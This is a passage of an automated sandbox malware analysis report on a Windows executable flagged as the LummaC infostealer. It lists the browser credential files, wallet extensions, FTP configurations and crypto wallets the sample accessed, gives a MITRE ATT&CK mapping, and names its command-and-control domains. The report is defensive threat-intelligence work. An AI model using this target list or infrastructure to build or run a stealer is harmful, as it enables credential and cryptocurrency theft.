              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2086942025.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2086909296.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2102016717.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2087372814.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2102226797.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2101970932.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2102168913.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2103573537.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2061774988.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2074555367.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2061829602.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2062200123.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2103604047.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2075150921.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6648, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6648, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		34
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		751
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		21
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory34
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol41
              Data from Local System              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell              		Logon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
              Obfuscated Files or Information              		NTDS1
              File and Directory Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing              		LSA Secrets223
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe39%ReversingLabsWin32.Trojan.Generic
              file.exe51%VirustotalBrowse
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              necklacedmny.store23%VirustotalBrowse
              thumbystriw.store15%VirustotalBrowse
              presticitpo.store11%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg0%URL Reputationsafe
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              necklacedmny.store
              		188.114.96.3
              		truetrueunknown
              presticitpo.store
              		unknown
              		unknowntrueunknown
              thumbystriw.store
              		unknown
              		unknowntrueunknown
              crisiwarny.store
              		unknown
              		unknowntrue
                		unknown
                fadehairucw.store
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://necklacedmny.store/apitrue
                    		unknown
                    presticitpo.storetrue
                      		unknown
                      scriptyprefej.storetrue
                        		unknown
                        necklacedmny.storetrue
                          		unknown
                          fadehairucw.storetrue
                            		unknown
                            navygenerayk.storetrue
                              		unknown
                              founpiuer.storetrue
                                		unknown
                                thumbystriw.storetrue
                                  		unknown
                                  crisiwarny.storetrue
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://necklacedmny.store/5file.exe, 00000000.00000003.2155414603.000000000108A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156988651.000000000108A000.00000004.00000020.00020000.00000000.sdmptrue
                                      		unknown
                                      https://necklacedmny.store/apitiofile.exe, 00000000.00000003.2155745718.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2162814769.00000000056F2000.00000004.00000800.00020000.00000000.sdmptrue
                                        		unknown
                                        https://necklacedmny.store/C~Tfile.exe, 00000000.00000002.2156730025.0000000000FCE000.00000004.00000020.00020000.00000000.sdmptrue
                                          		unknown
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://necklacedmny.store:443/apiicrosoftfile.exe, 00000000.00000002.2156847859.000000000100E000.00000004.00000020.00020000.00000000.sdmptrue
                                              		unknown
                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.2101926012.000000000570E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://necklacedmny.store/apiersionnFfile.exe, 00000000.00000003.2155745718.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2162814769.00000000056F2000.00000004.00000800.00020000.00000000.sdmptrue
                                                  		unknown
                                                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.file.exe, 00000000.00000003.2102002943.000000000570F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101926012.000000000570E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2087120020.0000000005731000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2087120020.0000000005731000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://necklacedmny.store/cfile.exe, 00000000.00000003.2101926012.0000000005703000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124794270.00000000056F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124724016.0000000005704000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113979900.0000000005703000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2162831044.0000000005704000.00000004.00000800.00020000.00000000.sdmptrue
                                                      		unknown
                                                      https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctafile.exe, 00000000.00000003.2102002943.000000000570F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101926012.000000000570E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2088361896.0000000005810000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://necklacedmny.store/mfile.exe, 00000000.00000003.2075150921.0000000001095000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155414603.000000000108A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074555367.0000000001094000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156988651.000000000108A000.00000004.00000020.00020000.00000000.sdmptrue
                                                        		unknown
                                                        https://necklacedmny.store/apiPIfile.exe, 00000000.00000003.2155745718.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2162814769.00000000056F2000.00000004.00000800.00020000.00000000.sdmptrue
                                                          		unknown
                                                          https://necklacedmny.store/apiGfile.exe, 00000000.00000003.2155758852.0000000001031000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156940751.0000000001031000.00000004.00000020.00020000.00000000.sdmptrue
                                                            		unknown
                                                            https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgfile.exe, 00000000.00000003.2102002943.000000000570F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101926012.000000000570E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://necklacedmny.store/file.exe, file.exe, 00000000.00000003.2150400482.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124998793.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156730025.0000000000FCE000.00000004.00000020.00020000.00000000.sdmptrue
                                                              		unknown
                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.2102002943.000000000570F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101926012.000000000570E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://x1.c.lencr.org/0file.exe, 00000000.00000003.2087120020.0000000005731000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://x1.i.lencr.org/0file.exe, 00000000.00000003.2087120020.0000000005731000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2087120020.0000000005731000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&reffile.exe, 00000000.00000003.2102002943.000000000570F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101926012.000000000570E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477file.exe, 00000000.00000003.2102002943.000000000570F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101926012.000000000570E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://necklacedmny.store/Efile.exe, 00000000.00000003.2155414603.000000000108A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156988651.000000000108A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  		unknown
                                                                  https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2088361896.0000000005810000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://necklacedmny.store:443/apifile.exe, file.exe, 00000000.00000003.2155487590.000000000100E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156847859.000000000100E000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    		unknown
                                                                    https://necklacedmny.store/api.ILfile.exe, 00000000.00000003.2155745718.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2162814769.00000000056F2000.00000004.00000800.00020000.00000000.sdmptrue
                                                                      		unknown

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      188.114.96.3
                                                                      		necklacedmny.storeEuropean Union
                                                                      		13335CLOUDFLARENETUStrue

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1545849
                                                                      Start date and time:2024-10-31 07:13:11 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 5m 23s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:4
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:file.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@1/0@5/1
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:Failed
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
